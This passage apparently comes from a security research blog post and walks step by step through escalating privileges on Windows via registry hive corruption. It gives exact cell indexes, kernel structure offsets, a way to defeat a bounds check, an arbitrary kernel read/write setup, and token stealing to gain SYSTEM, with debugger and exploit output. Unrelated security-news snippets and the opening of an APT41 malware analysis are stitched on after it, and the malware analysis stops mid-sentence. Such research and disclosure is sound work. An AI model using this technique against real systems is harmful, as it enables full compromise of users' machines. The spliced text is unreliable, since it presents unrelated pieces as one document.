HKCU\Exploit\Scratchpad\FakeKey key and its two values. Once this data layout is achieved, it becomes possible to open a handle to the "FakeKey" using standard APIs such as RegOpenKeyEx, and then operate on arbitrary cell indexes through its values. In reality, the process of crafting these objects after triggering the UAF is slightly more complicated than just setting data for four different values and requires the following steps: Writing to the "FakeKeyContainer" value with an initial, basic representation of the "FakeKey" key. At this stage, it is not important that the key node is entirely correct, but it must be of the appropriate length, and thus precisely cover the freed cell currently pointed to by the subkey list of the "Scratchpad" key.Setting the data for the other three container values – again, not the final ones yet, but those that have the appropriate length and are filled with unique markers, so that they can be easily recognized later on.Launching an info-leak loop to find the three cell indexes corresponding to the data cells of the "ValueListContainer", "KernelAddrContainer" and "KernelDataContainer" values, as well as a cell index of a valid security descriptor. This logic relies on abusing the _CM_KEY_NODE.Class and _CM_KEY_NODE.ClassLength fields of the "FakeKey" to point them to the data in the hive that we want to read. Specifically, the ClassLength member is set to 0xFFC, and the Class member is set to indexes 0x80000000, 0x80001000, 0x80002000, ... in subsequent loop iterations. This enables a kind of "arbitrary hive read" primitive, and the reading can be achieved by calling the NtEnumerateKey syscall on the "Scratchpad" key with the KeyNodeInformation class, which returns, among other things, the class property for a given subkey. This way, we get all the information about the internal hive layout needed to construct the final form of each of the imitated cells.Using the above information to set the correct data for each of the four cells: the key node of the "FakeKey" key with a valid security descriptor and index to the value list, the value list itself, and the value nodes of "KernelAddr" and "KernelData". This makes "FakeKey" a full-fledged key as seen by Windows, but with all of its internal regf structures fully controlled by us. If all of these steps are successful, we should be able to open the HKCU\Exploit\Scratchpad key in Regedit and see the current exploitation progress. An example from my test system is shown in the screenshot below. The extra "Filler" value is used to fill the space occupied by the old "TmpKeyName" key node freed during the rename operation. This is necessary so that the data of the "FakeKeyContainer" value correctly aligns with the freed cell of the "SubKey1" key, but I skipped this minor implementation detail in the above high-level description of the logic for the sake of clarity. Step 2: Getting read/write access to the CMHIVE kernel object Since we now have full control over some registry values, the next logical step would be to initialize them with a specially crafted OOB cell index and then check if we can actually access the kernel structure it represents. Let's say that we set the type of the "KernelData" value to REG_BINARY, its length to 0x100, and the data cell index to the previously calculated value of 0xB2603000, which should point back at the hive's _CMHIVE structure on the kernel pool. If we do this, and then browse to the "FakeKey" key in the Registry Editor, we will encounter an unpleasant surprise: This is definitely not the result we expected, and something must have gone wrong. If we investigate the system crash in WinDbg, we will get the following information: Break instruction exception - code 80000003 (first chance) A fatal system error has occurred. Debugger entered on first try; Bugcheck callbacks have not been invoked. A fatal system error has occurred. nt!DbgBreakPointWithStatus: fffff800`8061ff20 cc              int     3 0: kd> !analyze -v ******************************************************************************* *                                                                             * *                        Bugcheck Analysis                                    * *                                                                             * ******************************************************************************* REGISTRY_ERROR (51) Something has gone badly wrong with the registry.  If a kernel debugger is available, get a stack trace. It can also indicate that the registry got an I/O error while trying to read one of its files, so it can be caused by hardware problems or filesystem corruption. It may occur due to a failure in a refresh operation, which is used only in by the security system, and then only when resource limits are encountered. Arguments: Arg1: 0000000000000001, (reserved) Arg2: ffffd4855dc36000, (reserved) Arg3: 00000000b2603000, depends on where Windows BugChecked, may be pointer to hive Arg4: 000000000000025d, depends on where Windows BugChecked, may be return code of         HvCheckHive if the hive is corrupt. [...] 0: kd> k  # Child-SP          RetAddr               Call Site 00 ffff828b`b100be68 fffff800`80763642     nt!DbgBreakPointWithStatus 01 ffff828b`b100be70 fffff800`80762e81     nt!KiBugCheckDebugBreak+0x12 02 ffff828b`b100bed0 fffff800`80617957     nt!KeBugCheck2+0xa71 03 ffff828b`b100c640 fffff800`80a874d5     nt!KeBugCheckEx+0x107 04 ffff828b`b100c680 fffff800`8089dfd5     nt!HvpReleaseCellPaged+0x1ec1a5 05 ffff828b`b100c6c0 fffff800`808a29be     nt!CmpQueryKeyValueData+0x1a5 06 ffff828b`b100c770 fffff800`808a264e     nt!CmEnumerateValueKey+0x13e 07 ffff828b`b100c840 fffff800`80629e75     nt!NtEnumerateValueKey+0x31e 08 ffff828b`b100ca70 00007ff8`242c4114     nt!KiSystemServiceCopyEnd+0x25 09 00000008`c747dc38 00000000`00000000     0x00007ff8`242c4114 We are seeing bugcheck code 0x51 (REGISTRY_ERROR), which indicates that it was triggered intentionally rather than through a bad memory access. Additionally, the direct caller of KeBugCheckEx is HvpReleaseCellPaged, a function that we haven't really mentioned so far in this blog post series. To better understand what is actually happening here, we need to take a step back and look at the general scheme of cell operations as implemented in the Windows kernel. It typically follows a common pattern:   _HV_GET_CELL_CONTEXT Context;   //   // Translate the cell index to virtual address   //   PVOID CellAddress = Hive->GetCellRoutine(Hive, CellIndex, &Context);   //   // Operate on the cell view using the CellAddress pointer   //   ...   //   // Release the cell   //   Hive->ReleaseCellRoutine(Hive, &Context) There are three stages here: translating the cell index to a virtual address, performing operations on that cell, and releasing it. We are already familiar with the first two, and they are both obvious, but what is the release about? Based on a historical analysis of various Windows kernel builds, it turns out that in some versions, a get+release function pair was not only used for translating cell indexes to virtual addresses, but also to ensure that the memory view of the cell would not be accidentally unmapped between these two calls. The presence or absence of the "release" function in consecutive Windows versions is shown below:Windows NT 3.1 – 2000: ❌Windows XP – 7: ✅Windows 8 – 8.1: ❌Windows 10 – 11: ✅ Let's take a look at the decompiled HvpReleaseCellPaged function from Windows 10, 1507 (build 10240), where it first reappeared after a hiatus in Windows 8.x: VOID HvpReleaseCellPaged(_CMHIVE *CmHive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX RealCell;   _HMAP_ENTRY *MapEntry;   RealCell = Context->Cell & 0xFFFFFFFE;   MapEntry = HvpGetCellMap(&CmHive->Hive, RealCell);   if (MapEntry == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, CmHive, RealCell, 0x291);   }   if ((Context->Cell & 1) != 0) {     HvpMapEntryReleaseBinAddress(MapEntry);   }   HvpGetCellContextReinitialize(Context); } _HMAP_ENTRY *HvpGetCellMap(_HHIVE *Hive, _HCELL_INDEX CellIndex) {   DWORD StorageType = CellIndex >> 31;   DWORD StorageIndex = CellIndex & 0x7FFFFFFF;   if (StorageIndex < Hive->Storage[StorageType].Length) {     return &Hive->Storage[StorageType].Map                                      ->Directory[(CellIndex >> 21) & 0x3FF]                                      ->Table[(CellIndex >> 12) & 0x1FF];   } else {     return NULL;   } } VOID HvpMapEntryReleaseBinAddress(_HMAP_ENTRY *MapEntry) {   ExReleaseRundownProtection(&MapEntry->TemporaryBinRundown); } VOID HvpGetCellContextReinitialize(_HV_GET_CELL_CONTEXT *Context) {   Context->Cell = -1;   Context->Hive = NULL; } As we can see, the main task of HvpReleaseCellPaged and its helper functions was to find the _HMAP_ENTRY structure that corresponded to a given cell index, and then potentially call the ExReleaseRundownProtection API on the _HMAP_ENTRY.TemporaryBinRunDown field. This behavior was coordinated with the implementation of HvpGetCellPaged, which called ExAcquireRundownProtection on the same object. An additional side effect was that during the lookup of the _HMAP_ENTRY structure, a bounds check was performed on the cell index, and if it failed, a REGISTRY_ERROR bugcheck was triggered. This state of affairs persisted for about two years, until Windows 10 1803 (build 17134). In that version, the code was greatly simplified: the TemporaryBinAddress and TemporaryBinRundown members were removed from _HMAP_ENTRY, and the call to ExReleaseRundownProtection was eliminated from HvpReleaseCellPaged. This effectively meant that there was no longer any reason for this function to retrieve a pointer to the map entry (as it was not used for anything), but for some unclear reason, this logic has remained in the code to this day. In most modern kernel builds, the auxiliary functions have been inlined, and HvpReleaseCellPaged now takes the following form: VOID HvpReleaseCellPaged(_HHIVE *Hive, _HV_GET_CELL_CONTEXT *Context) {   _HCELL_INDEX Cell = Context->Cell;   DWORD StorageIndex = Cell & 0x7FFFFFFF;   DWORD StorageType = Cell >> 31;   if (StorageIndex >= Hive->Storage[StorageType].Length ||       &Hive->Storage[StorageType].Map->Directory[(Cell >> 21) & 0x3FF]->Table[(Cell >> 12) & 0x1FF] == NULL) {     KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267);   }   Context->Cell = -1;   Context->BinContext = 0; } The bounds check on the cell index is clearly still present, but it doesn't serve any real purpose. Based on this, we can assume that this is more likely a historical relic rather than a mitigation deliberately added by the developers. Still, it interferes with our carefully crafted exploitation technique. Does this mean that OOB cell indexes are not viable because their use will always result in a forced BSoD, and we have to look for other privilege escalation methods instead? As it turns out, not necessarily. Indeed, if the bounds check was located in the HvpGetCellPaged function, there wouldn't be much to discuss – a blue screen would always occur right before using any OOB index, completely neutralizing this idea's usefulness. However, as things stand, resolving such an index works without issues, and we can perform a single invalid memory operation before a crash occurs in the release call. In many ways, this sounds like a "pwn" task straight out of a CTF, where the attacker is given a memory corruption primitive that is theoretically exploitable, but somehow artificially limited, and the goal is to figure out how to cleverly bypass this limitation. Let's take another look at the if statement that stands in our way: if (StorageIndex >= Hive->Storage[StorageType].Length || /* ... */) {   KeBugCheckEx(REGISTRY_ERROR, 1, (ULONG_PTR)Hive, Cell, 0x267); } The index is compared against the value of the long-lived _HHIVE.Storage[StorageType].Length field, which is located at a constant offset from the beginning of the _HHIVE structure. On the Windows 11 system I tested, this offset is 0x118 for stable storage and 0x390 for volatile storage: 0: kd> dx (&((_HHIVE*)0)->Storage[0].Length) (&((_HHIVE*)0)->Storage[0].Length)                 : 0x118 0: kd> dx (&((_HHIVE*)0)->Storage[1].Length) (&((_HHIVE*)0)->Storage[1].Length)                 : 0x390 As we established earlier, the special out-of-bounds index 0xB2603000 points to the base address of the _CMHIVE / _HHIVE structure. By adding one of the offsets above, we can obtain an index that points directly to the Length field. Let's test this in practice: 0: kd> dx (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)  (&((nt!_CMHIVE*)0xffff810713f82000)->Hive.Storage[1].Length)                  : 0xffff810713f82390 0: kd> !reg cellindex 0xffff810713f82000 0xB2603390-4 Map = ffff810713f823a0 Type = 1 Table = 193 Block = 3 Offset = 38c MapTable     = ffff810713debe90  MapEntry     = ffff810713debed8  BinAddress = ffff810713f82000, BlockOffset = 0000000000000000 BlockAddress = ffff810713f82000  pcell:  ffff810713f82390 So, indeed, index 0xB260338C points to the field representing the length of the volatile space in the HKCU hive. This is very good news for an attacker, because it means that they are able to neutralize the bounds check in HvpReleaseCellPaged by performing the following steps: Crafting a controlled registry value with a data index of 0xB260338C.Setting this value programmatically to a very large number, such as 0xFFFFFFFF, and thus overwriting the _HHIVE.Storage[1].Length field with it.During the NtSetValueKey syscall in step 2, when HvpReleaseCellPaged is called on index 0xB260338C, the Length member has already been corrupted. As a result, the condition checked by the function is not satisfied, and the KeBugCheckEx call never occurs.Since the _HHIVE.Storage[1].Length field is located in a global hive object and does not change very often (unless the storage space is expanded or shrunk), all future checks performed in HvpReleaseCellPaged against this hive will no longer pose any risk to the exploit stability. To better realize just how close the overwriting of the Length field is to its use in the bounds check, we can have a look at the disassembly of the CmpSetValueKeyExisting function, where this whole logic takes place. The technique works by a hair's breadth – the memmove and HvpReleaseCellPaged calls are separated by only a few instructions. Nevertheless, it works, and if we first perform a write to the 0xB260338C index (or equivalent) after gaining binary control over the hive, then we will be subsequently able to read from/write to any OOB indexes without any restrictions in the future. For completeness, I should mention that after corrupting the Length field, it is worthwhile to set a few additional flags in the _HHIVE.HiveFlags field using the same trick as before. This prevents the kernel from crashing due to the unexpectedly large hive length. Specifically, the flags are (as named in blog post #6):HIVE_COMPLETE_UNLOAD_STARTED (0x40): This prevents a crash during potential hive unloading in the CmpLateUnloadHiveWorker → CmpCompleteUnloadKey → HvHiveCleanup → HvpFreeMap → CmpFree function.HIVE_FILE_READ_ONLY (0x8000): This prevents a crash that could occur in the CmpFlushHive → HvStoreModifiedData → HvpTruncateBins path. Of course, these are just conclusions drawn from writing a demonstration exploit, so I don't guarantee that the above flags are sufficient to maintain system stability in every configuration. Nevertheless, repeated tests have shown that it works in my environment, and if we subsequently set the data cell index of the controlled value back to 0xB2603000, and the Type/DataLength fields to something like REG_BINARY and 0x100, we should be finally able to see the following result in the Registry Editor: It is easy to verify that this is indeed a "live view" into the _CMHIVE structure in kernel memory: 0: kd> dt _HHIVE ffff810713f82000 nt!_HHIVE    +0x000 Signature        : 0xbee0bee0    +0x008 GetCellRoutine   : 0xfffff801`8049b370     _CELL_DATA*  nt!HvpGetCellPaged+0    +0x010 ReleaseCellRoutine : 0xfffff801`8049b330     void  nt!HvpReleaseCellPaged+0    +0x018 Allocate         : 0xfffff801`804cae30     void*  nt!CmpAllocate+0    +0x020 Free             : 0xfffff801`804c9100     void  nt!CmpFree+0    +0x028 FileWrite        : 0xfffff801`80595e00     long  nt!CmpFileWrite+0    +0x030 FileRead         : 0xfffff801`805336a0     long  nt!CmpFileRead+0    +0x038 HiveLoadFailure  : (null)    +0x040 BaseBlock        : 0xffff8107`13f9a000 _HBASE_BLOCK [...] Unfortunately, the hive signature 0xBEE0BEE0 is not visible in the screenshot, because the first four bytes of the cell are treated as its size, and only the subsequent bytes as actual data. For this reason, the entire view of the structure is shifted by 4 bytes. Nevertheless, it is immediately apparent that we have gained direct access to function addresses within the kernel image, as well as many other interesting pointers and data. We are getting very close to our goal!Step 3: Getting arbitrary read/write access to the entire kernel address space At this point, we can both read from and write to the _CMHIVE structure through our magic value, and also operate on any other out-of-bounds cell index that resolves to a valid address. This means that we no longer need to worry about kernel ASLR, as _CMHIVE readily leaks the base address of ntoskrnl.exe, as well as many other addresses from kernel pools. The question now is how, with these capabilities, to execute our own payload in kernel-mode or otherwise elevate our process's privileges in the system. What may immediately come to mind based on the layout of the _CMHIVE / _HHIVE structure is the idea of overwriting one of the function pointers located at the beginning. In practice, this is less useful than it seems. As I wrote in blog post #6, the vast majority of operations on these pointers have been devirtualized, and in the few cases where they are still used directly, the Control Flow Guard mitigation is enabled. Perhaps something could be ultimately worked out to bypass CFG, but with the primitives currently available to us, I decided that this sounds more difficult than it should be. If not that, then what else? Experienced exploit developers would surely find dozens of different ways to complete the privilege escalation process. However, I had a specific goal in mind that I wanted to achieve from the start. I thought it would be elegant to create an arrangement of objects where the final stage of exploitation could be performed interactively from within Regedit. This brings us back to the selection of our two fake values, "KernelAddr" and "KernelData". My goal with these values was to be able to enter any kernel address into KernelAddr, and have KernelData automatically—based solely on how the registry works—contain the data from that address, available for both reading and writing. This would enable a very unique situation where the user could view and modify kernel memory within the graphical interface of a tool available in a default Windows installation—something that doesn't happen very often. 🙂 The crucial observation that allows us to even consider such a setup is the versatility of the cell maps mechanism. In order for such an obscure arrangement to work, KernelData must utilize a _HMAP_ENTRY structure controlled by KernelAddr at the final stage of the cell walk. Referring back to the previous diagram illustrating the relationships between the _CMHIVE structure and other objects, this implies that if KernelAddr reaches an object through two pointer dereferences, KernelData must be configured to reach it with a single dereference, so that the second dereference then occurs through the data stored in KernelAddr. In practice, this can be achieved as follows: KernelAddr will function similarly as before, pointing to an offset within _CMHIVE using a series of pointer dereferences: _CMHIVE.CmRm → _CM_RM.Hive → _CMHIVE: for normal hives (e.g., HKCU)._CMHIVE.RootKcb → _CM_KEY_CONTROL_BLOCK.KeyHive → _CMHIVE: for app hives. For KernelData, we can use any self-referencing pointer in the first step of the cell walk. These are plentiful in _CMHIVE, due to the fact that there are many LIST_ENTRY objects initialized as an empty list. The next step is to select the appropriate offsets and indexes based on the layout of the _CMHIVE structure, so that everything aligns with our plan. Starting with KernelAddr, the highest 20 bits of the cell index remain the same as before, which is 0xB2603???. The lower 12 bits will correspond to an offset within _CMHIVE where we will place our fake _HMAP_ENTRY object. This should be a 0x18 byte area that is generally unused and located after a self-referencing pointer. For demonstration purposes, I used offset 0xB70, which corresponds to the following fields: _CMHIVE layout _HMAP_ENTRY layout +0xb70 UnloadEventArray : Ptr64 Ptr64 _KEVENT +0x000 BlockOffset         : Uint8B +0xb78 RootKcb          : Ptr64 _CM_KEY_CONTROL_BLOCK +0x008 PermanentBinAddress : Uint8B +0xb80 Frozen           : UChar +0x010 MemAlloc            : Uint4B On my test Windows 11 system, all these fields are zeroed out and unused for the HKCU hive, which makes them well-suited for acting as the _HMAP_ENTRY structure. The final cell index for the KernelAddr value will, therefore, be 0xB2603000 + 0xB70 - 0x4 = 0xB2603B6C. If we set its type to REG_QWORD and its length to 8 bytes, then each write to it will result in setting the _CMHIVE.UnloadEventArray field (or _HMAP_ENTRY.BlockOffset in the context of the cell walk) to the specified 64-bit number. As for KernelData, we will use _CMHIVE.SecurityHash[3].Flink, located at offset 0x798, as the aforementioned self-referencing pointer. To calculate the directory index value, we need to subtract it from the offset of _CMHIVE.Hive.Storage[1].SmallDir and then divide by 8, which gives us: (0x798 - 0x3A0) ÷ 8 = 0x7F. Next, we will calculate the table index by subtracting the offset of the fake _HMAP_ENTRY structure from the offset of the self-referencing pointer and then dividing the result by the size of _HMAP_ENTRY: (0xB70 - 0x798) ÷ 0x18 = 0x29. If we assume that the 12-bit offset part is zero (we don't want to add any offsets at this point), then we have all the elements needed to compose the full cell index. We will use the MakeCellIndex helper function defined earlier for this purpose: >>> MakeCellIndex(1, 0x7F, 0x29, 0) 0x8fe29000 So, the cell index for the KernelData value will be 0x8FE29000, and with that, we have all the puzzle pieces needed to assemble our intricate construction. This is illustrated in the diagram below: The cell map walk for the KernelAddr value is shown on the right side of the _CMHIVE structure, and the cell map walk for KernelData is on the left. The dashed arrows marked with numbers ①, ②, and ③ correspond to the consecutive elements of the cell index (i.e., directory index, table index, and offset), while the solid arrows represent dereferences of individual pointers. As you can see, we successfully managed to select indexes where the data of one value directly influences the target virtual address to which the other one is resolved. We could end this section right here, but there is one more minor issue I'd like to mention. As you may recall, the HvpGetCellPaged function ends with the following statement: return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; Our current assumption is that the PermanentBinAddress and the lower 12 bits of the index are both zero, and BlockOffset contains the exact value of the address we want to access. Unfortunately, the expression ends with the extra "+4". Normally, this skips the cell size and directly returns a pointer to the cell's data, but in our exploit, it means we would see a view of the kernel memory shifted by four bytes. This isn't a huge issue in practical terms, but it doesn't look perfect in a demonstration. So, can we do anything about this? It turns out, we can. What we want to achieve is to subtract 4 from the final result using the other controlled addends in the expression (PermanentBinAddress and BlockOffset). Individually, each of them has some limitations: The PermanentBinAddress is a fully controlled 64-bit field, but only its upper 60 bits are used when constructing the cell address. This means we can only use it to subtract multiples of 0x10, but not exactly 4.The cell offset is a 12-bit unsigned number, so we can use it to add any number in the 1–4095 range, but we can't subtract anything. However, we can combine both of them together to achieve the desired goal. If we set PermanentBinAddress to 0xFFFFFFFFFFFFFFF0 (-0x10 in 64-bit representation) and the cell offset to 0xC, their sum will be -4, which will mutually reduce with the unconditionally added +4, causing the HvpGetCellPaged function to return exactly Entry->BlockOffset. For our exploit, this means one additional write to the _CMHIVE structure to properly initialize the fake PermanentBinAddress field, and a slight change in the cell index of the KernelData value from the previous 0x8FE29000 to 0x8FE2900C. If we perform all these steps correctly, we should be able to read and write arbitrary kernel memory via Regedit. For example, let's dump the data at the beginning of the ntoskrnl.exe kernel image using WinDbg: 0: kd> ? nt Evaluate expression: -8781857554432 = fffff803`50800000 0: kd> db /c8 fffff803`50800004 fffff803`50800004  03 00 00 00 04 00 00 00  ........ fffff803`5080000c  ff ff 00 00 b8 00 00 00  ........ fffff803`50800014  00 00 00 00 40 00 00 00  ....@... fffff803`5080001c  00 00 00 00 00 00 00 00  ........ fffff803`50800024  00 00 00 00 00 00 00 00  ........ fffff803`5080002c  00 00 00 00 00 00 00 00  ........ fffff803`50800034  00 00 00 00 00 00 00 00  ........ fffff803`5080003c  10 01 00 00 0e 1f ba 0e  ........ fffff803`50800044  00 b4 09 cd 21 b8 01 4c  ....!..L fffff803`5080004c  cd 21 54 68 69 73 20 70  .!This p fffff803`50800054  72 6f 67 72 61 6d 20 63  rogram c fffff803`5080005c  61 6e 6e 6f 74 20 62 65  annot be And then let's browse to the same address using our FakeKey in Regedit: The data from both sources match, and the KernelData value displays them correctly without any additional offset. A keen observer will note that the expected "MZ" signature is not there, because I entered an address 4 bytes greater than the kernel image base. I did this because, even though we can "peek" at any virtual address X through the special registry value, the kernel still internally accesses address X-4 for certain implementation reasons. Since there isn't any data mapped directly before the ntoskrnl.exe image in memory, using the exact image base would result in a system crash while trying to read from the invalid address 0xFFFFF803507FFFFC. An even more attentive reader will also notice that the exploit has jokingly changed the window title from "Registry Editor" to "Kernel Memory Editor", as that's what the program has effectively become at this point. 🙂Step 4: Elevating process security token With an arbitrary kernel read/write primitive and the address of ntoskrnl.exe at our disposal, escalating privileges is a formality. The simplest approach is perhaps to iterate through the linked list of all processes (made of _EPROCESS structures) starting from nt!KiProcessListHead, find both the "System" process and our own process on the list, and then copy the security token from the former to the latter. This method is illustrated in the diagram below. This entire procedure could be easily performed programmatically, using only RegQueryValueEx and RegSetValueEx calls. However, it would be a shame not to take advantage of the fact that we can modify kernel memory through built-in Windows tools. Therefore, my exploit performs most of the necessary steps automatically, except for the final stage – overwriting the process security token. For that part, it creates a .reg file on disk that refers to our fake key and its two registry values. The first is KernelAddr, which points to the address of the security token within the _EPROCESS structure of a newly created command prompt, followed by KernelData, which contains the actual value of the System token. The invocation and output of the exploit looks as follows: C:\Users\user\Desktop\exploits>Exploit.exe C:\users\user\Desktop\become_admin.reg [+] Found kernel base address: fffff80350800000 [+] Spawning a command prompt... [+] Found PID 6892 at address ffff8107b3864080 [+] System process: ffff8107ad0ed040, security token: ffffc608b4c8a943 [+] Exploit succeeded, enjoy! C:\Users\user\Desktop\exploits> Then, a new command prompt window appears on the screen. There, we can manually perform the final step of the attack, applying changes from the newly created become_admin.reg file using the reg.exe tool, thus overwriting the appropriate field in kernel memory and granting ourselves elevated privileges: As we can see, the attack was indeed successful, and our cmd.exe process is now running as NT AUTHORITY\SYSTEM. A similar effect could be achieved from the graphical interface by double-clicking the .reg file and applying it using the Regedit program associated with this extension. This is exactly how I finalized my attack during the exploit demonstration at OffensiveCon 2024, which can be viewed in the recording of the presentation: Final thoughts Since we have now fully achieved our intended goal, we can return to our earlier, incomplete diagram, and fill it in with all the intermediate steps we have taken: To conclude this blog post, I would like to share some final thoughts regarding hive-based memory corruption vulnerabilities.Exploit mitigations The above exploit shows that out-of-bounds cell indexes in the registry are a powerful exploitation technique, whose main strength lies in its determinism. Within a specific version of the operating system, a given OOB index will always result in references to the same fields of the _CMHIVE structure, which eliminates the need to use any probabilistic exploitation methods such as kernel pool spraying. Of all the available hive memory corruption exploitation methods, I consider this one to be the most stable and practical. Therefore, it should come as no surprise that I would like Microsoft to mitigate this technique for the security of all Windows users. I already emphasized this in my previous blog post #7, but now the benefit of this mitigation is even more apparent: since the cell index bounds check is already present in HvpReleaseCellPaged, moving it to HvpGetCellPaged should be completely neutral in terms of system performance, and it would fully prevent the use of OOB indexes for any malicious purposes. I suggested this course of action in November 2023, but it hasn't been implemented by the vendor yet, so all the techniques described here still work at the time of publication.False File Immutability So far in this blog, we have mostly focused on a scenario where we can control the internal regf data of an active hive through memory corruption. This is certainly the most likely reason why someone would take control of registry structures, but not necessarily the only one. As I already mentioned in the previous posts, Windows uses section objects and their corresponding section views to map hive files into memory. This means that the mappings are backed by the corresponding files, and if any of them are ever evicted from memory (e.g., due to memory pressure in the system), they will be reloaded from disk the next time they are accessed. Therefore, it is crucial for system security to protect actively loaded hives from being simultaneously written to. This guarantee is achieved in the CmpOpenHiveFile function through the ShareAccess argument passed to ZwCreateFile, which takes a value of 0 or at most FILE_SHARE_READ, but never FILE_SHARE_WRITE. This causes the operating system to ensure that no application can open the file for writing as long as the handle remains open. As I write these words, the research titled False File Immutability, published by Gabriel Landau in 2024, naturally comes to my mind. He effectively demonstrated that for files opened from remote network shares (e.g., via the SMB protocol), guarantees regarding their immutability may not be upheld in practice, as the local computer simply lacks physical control over it. However, the registry implementation is generally prepared for this eventuality: for hives loaded from locations other than the system partition, the HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL and VIEW_MAP_MUST_BE_KEPT_LOCAL flags are used, as discussed in blog post #6. These flags instruct the kernel to keep local copies of each memory page for such hives, never allowing them to be completely evicted and, as a result, having to be read again from remote storage. Thus, the attack vector seems to be correctly addressed. However, during my audit of the registry's memory management implementation last year, I discovered two related vulnerabilities: CVE-2024-43452 and CVE-2024-49114. The second one is particularly noteworthy because, by abusing the Cloud Filter API functionality and its "placeholder files", it was possible to arbitrarily modify active hive files in the system, including those loaded from the C:\ drive. This completely bypassed the sharing access right checks and their associated security guarantees. With this type of issue, the hive corruption exploitation techniques can be used without any actual memory corruption taking place, by simply replacing the memory in question with controlled data. I believe that vulnerabilities of this class can be a real treat for bug hunters, and they are certainly worth remembering for the future.Conclusion Dear reader, if you've made it to the end of this blog post, and especially if you've read all the posts in this series, I'd like to sincerely congratulate you on your perseverance. 🙂 Through these write ups, I hope I've managed to document as many implementation details of the registry as possible; details that might otherwise have never seen the light of day. My goal was to show how interesting and internally complex this mechanism is, and in particular, what an important role it plays in the security of Windows as a whole. Thank you for joining me on this adventure, and see you next time!

Authorities in Pakistan have arrested 21 individuals accused of operating "Heartsender," a once popular spam and malware dissemination service that operated for more than a decade. The main clientele for HeartSender were organized crime groups that tried to trick victim companies into making payments to a third party, and its alleged proprietors were publicly identified by KrebsOnSecurity in 2021 after they inadvertently infected their computers with malware.

An Iranian national has pleaded guilty in the U.S. over his involvement in an international ransomware and extortion scheme involving the Robbinhood ransomware. Sina Gholinejad (aka Sina Ghaaf), 37, and his co-conspirators are said to have breached the computer networks of various organizations in the United States and encrypted files with Robbinhood ransomware to demand Bitcoin ransom payments....

98% of reviewers recommend Palo Alto Networks industry-leading security, Cortex XDR, as Gartner Customers' Choice for Endpoint Protection Platforms. The post Cortex XDR Named 2025 Gartner Customers’ Choice for Endpoint Security appeared first on Palo Alto Networks Blog.

The Czech Republic on Wednesday formally accused a threat actor associated with the People's Republic of China (PRC) of targeting its Ministry of Foreign Affairs. In a public statement, the government said it identified China as the culprit behind a malicious campaign targeting one of the unclassified networks of the Czech Ministry of Foreign Affairs. The extent of the breach is presently not...

More than 40% of breaches in fintech organizations can be linked to third-party vendors.

The post What’s New in 6.2 Spring Release appeared first on Graylog.

Explore common vulnerabilities and exposures to enhance your security practices. Learn how to protect your assets effectively. The post Understanding Common Vulnerabilities and Exposures (CVEs) and Their Role in Deceptive Threat Detection appeared first on Fidelis Security.

Blogs Blog Leader of Qakbot Malware Conspiracy Indicted for Involvement in Global Ransomware Scheme “A federal indictment unsealed today charges Rustam Rafailevich Gallyamov, 48, of Moscow, Russia, with leading a group of cyber criminals who developed and deployed the Qakbot malware. In connection with the charges, the Justice Department filed today a civil forfeiture complaint against over $24 million […] The post Leader of Qakbot Malware Conspiracy Indicted for Involvement in Global Ransomware Scheme appeared first on Flashpoint.

The data collector said the stolen data includes Social Security numbers.

Written by: Patrick Whitsell Google Threat Intelligence Group’s (GTIG) mission is to protect Google’s billions of users and Google’s multitude of products and services. In late October 2024, GTIG discovered an exploited government website hosting malware being used to target multiple other government entities. The exploited site delivered a malware payload, which we have dubbed “TOUGHPROGRESS”, that took advantage of Google Calendar for command and control (C2). Misuse of cloud services for C2 is a technique that many threat actors leverage in order to blend in with legitimate activity.  We assess with high confidence that this malware is being used by the PRC based actor APT41 (also tracked as HOODOO). APT41’s targets span the globe, including governments and organizations within the global shipping and logistics, media and entertainment, technology, and automotive sectors.  Overview In this blog post we analyze the malware delivery methods, technical details of the malware attack chain, discuss other recent APT41 activities, and share indicators of compromise (IOCs) to help security practitioners defend against similar attacks. We also detail how GTIG disrupted this campaign using custom detection signatures, shutting down attacker-controlled infrastructure, and protections added to Safe Browsing. Figure 1: TOUGHPROGRESS campaign overview Delivery APT41 sent spear phishing emails containing a link to the ZIP archive hosted on the exploited government website. The archive contains an LNK file, masquerading as a PDF, and a directory. Within this directory we find what looks like seven JPG images of arthropods. When the payload is executed via the LNK, the LNK is deleted and replaced with a decoy PDF file that is displayed to the user indicating these species need to be declared for export. $ unzip -l 出境海關申報清單.zip Length Date Time Name --------- ---------- ----- ---- 0 2024-10-23 11:00 image/ 12633 2024-10-23 10:53 image/1.jpg 10282 2024-10-23 10:54 image/2.jpg 8288 2024-10-23 10:54 image/3.jpg 4174 2024-10-23 10:54 image/4.jpg 181656 2024-10-23 10:54 image/5.jpg 997111 2024-10-23 11:00 image/6.jpg 124928 2024-10-23 11:00 image/7.jpg 88604 2024-10-23 11:03 申報物品清單.pdf.lnk --------- ------- 1427676 9 files The files “6.jpg” and “7.jpg” are fake images. The first file is actually an encrypted payload and is decrypted by the second file, which is a DLL file launched when the target clicks the LNK.  Malware Infection Chain This malware has three distinct modules, deployed in series, each with a distinct function. Each module also implements stealth and evasion techniques, including memory-only payloads, encryption, compression, process hollowing, control flow obfuscation, and leveraging Google Calendar for C2. PLUSDROP - DLL to decrypt and execute the next stage in memory. PLUSINJECT - Launches and performs process hollowing on a legitimate “svchost.exe” process, injecting the final payload. TOUGHPROGRESS - Executes actions on the compromised Windows host. Uses Google Calendar for C2.  TOUGHPROGRESS Analysis TOUGHPROGRESS begins by using a hardcoded 16-byte XOR key to decrypt embedded shellcode stored in the sample’s “.pdata” region. The shellcode then decompresses a DLL in memory using COMPRESSION_FORMAT_LZNT1. This DLL layers multiple obfuscation techniques to obscure the control flow.  Register-based Indirect Calls Dynamic Address Arithmetic 64-bit register overflow Function Dispatch Table The registered-based indirect call is used after dynamically calculating the address to store in the register. This calculation involves two or more hardcoded values that intentionally overflow the 64-bit register. Here is an example calling CreateThread. Figure 2: Register-based indirect call with dynamic address arithmetic and 64-bit overflow We can reproduce how this works using Python “ctypes” to simulate 64-bit register arithmetic. Adding the two values together overflows the 64-bit address space and the result is the address of the function to be called. Figure 3: Demonstration of 64-bit address overflow Figure 4: CreateThread in Dispatch Table These obfuscation techniques manifest as a Control Flow Obfuscation 